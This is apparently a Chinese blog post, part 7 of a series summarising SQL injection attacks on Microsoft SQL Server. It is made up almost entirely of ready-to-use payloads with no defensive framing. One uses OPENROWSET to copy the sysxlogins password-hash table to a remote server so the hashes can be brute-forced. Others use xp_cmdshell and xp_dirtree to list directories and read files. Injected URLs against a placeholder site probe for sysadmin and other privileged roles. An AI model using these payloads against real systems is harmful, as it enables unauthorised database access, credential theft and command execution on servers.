2. 技术人生
    3. SQL注射总结(7)

    SQL注射总结(7)

    技术2022-05-11  125
    3、 复制哈西表(HASH)  这实际上是上述复制 数据库的一个扩展应用。登录密码的hash存储于sysxlogins中。方法如下:

    insert into OPENROWSET('SQLOLEDB', 'uid=sa;pwd=apachy_123;Network=DBMSSOCN;Address=202.100.100.1,1433;', 'select * from _sysxlogins') select * from database.dbo.sysxlogins

      得到hash之后,就可以进行暴力破解。这需要一点运气和大量时间。   遍历目录的方法:   先创建一个临时表:temp

    '5;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));--5';insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器5';insert into temp(id) exec master.dbo.xp_subdirs 'c:/';-- 获得子目录列表5';insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:/';-- 获得所有子目录的目录树结构,并寸入temp表中5';insert into temp(id) exec master.dbo.xp_cmdshell 'type c:/web/index.asp';-- 查看某个文件的内容5';insert into temp(id) exec master.dbo.xp_cmdshell 'dir c:/';--5';insert into temp(id) exec master.dbo.xp_cmdshell 'dir c:/ *.asp /s/a';--5';insert into temp(id) exec master.dbo.xp_cmdshell 'cscript C:/Inetpub/AdminScripts/adsutil.vbs enum w3svc'5';insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:/';-- (xp_dirtree适用权限PUBLIC)写入表:语句1:_blank>http://www.xxxxx.com/down/list.asp?id=1 and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- 语句2:_blank>http://www.xxxxx.com/down/list.asp?id=1 and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- 语句3:_blank>http://www.xxxxx.com/down/list.asp?id=1 and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- 语句4:_blank>http://www.xxxxx.com/down/list.asp?id=1 and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- 语句5:_blank>http://www.xxxxx.com/down/list.asp?id=1 and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- 语句6:_blank>http://www.xxxxx.com/down/list.asp?id=1 and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- 语句7:_blank>http://www.xxxxx.com/down/list.asp?id=1 and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- 语句8:_blank>http://www.xxxxx.com/down/list.asp?id=1 and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- 语句9:_blank>http://www.xxxxx.com/down/list.asp?id=1 and 1=(select IS_MEMBER('db_owner'));-- 把路径写到表中去:_blank>http://www.xxxxx.com/down/list.asp?id=1;create table dirs(paths varchar(100), id int)- _blank>http://http://www.xxxxx.com/down/list.asp?id=1;insert  dirs exec master.dbo.xp_dirtree 'c:/'- _blank>http://http://www.xxxxx.com/down/list.asp?id=1 and 0<>(select top 1 paths from dirs)- _blank>http://http://www.xxxxx.com/down/list.asp?id=1 and 0<>(select top 1 paths from dirs where paths not in('@Inetpub'))- 语句:_blank>http://http://www.xxxxx.com/down/list.asp?id=1;create table dirs1(paths varchar(100), id int)-- 语句:_blank>http://http://www.xxxxx.com/down/list.asp?id=1;insert dirs exec master.dbo.xp_dirtree 'e:/web'-- 语句:_blank>http://http://www.xxxxx.com/down/list.asp?id=1 and 0<>(select top 1 paths from dirs1)-

    关键字:软件  服务器  qq  os  msn  dos   美女 电影 小说 音乐 无极 汽车 MP3

    专利

    最新回复(0)